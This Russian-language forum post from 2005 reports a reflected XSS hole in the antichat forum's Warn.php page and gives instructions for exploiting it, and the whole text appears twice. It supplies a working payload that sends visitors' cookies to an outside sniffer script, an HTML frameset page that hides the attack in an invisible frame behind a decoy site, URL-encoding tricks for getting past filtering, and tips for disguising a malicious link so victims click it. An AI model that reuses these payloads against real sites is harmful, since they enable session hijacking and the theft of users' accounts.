censored!
11.05.2005, 21:42
http://forum.antichat.ru/Warn.php пропускает вхождения
Пример: http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0"><script>alert(document.cookie);</script>
Чего делать?
Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
Вот так выглядит index.html (в примере адрес снифера указан мой):
<html>
<head>
<title>Типа липовый сайт...</title>
</head>
<frameset cols="0,*" frameborder="NO" border="0" framespacing="0">
<frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22 http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
<frame name="mainFrame" src="main_frame.html">
</frameset>
<noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
</html>
...
*
Так как + (плюсик) вырезается, его заменяем: %2B
Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
" - %22
> - %3C
> - %3E
...
Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).
Как пример:
...
!ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
...
Всем добро пожаловать на сайт http://forum.antichat.ru (http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22 http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E)
...
© censored!
Пример: http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0"><script>alert(document.cookie);</script>
Чего делать?
Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
Вот так выглядит index.html (в примере адрес снифера указан мой):
<html>
<head>
<title>Типа липовый сайт...</title>
</head>
<frameset cols="0,*" frameborder="NO" border="0" framespacing="0">
<frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22 http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
<frame name="mainFrame" src="main_frame.html">
</frameset>
<noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
</html>
...
*
Так как + (плюсик) вырезается, его заменяем: %2B
Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
" - %22
> - %3C
> - %3E
...
Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).
Как пример:
...
!ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
...
Всем добро пожаловать на сайт http://forum.antichat.ru (http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22 http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E)
...
© censored!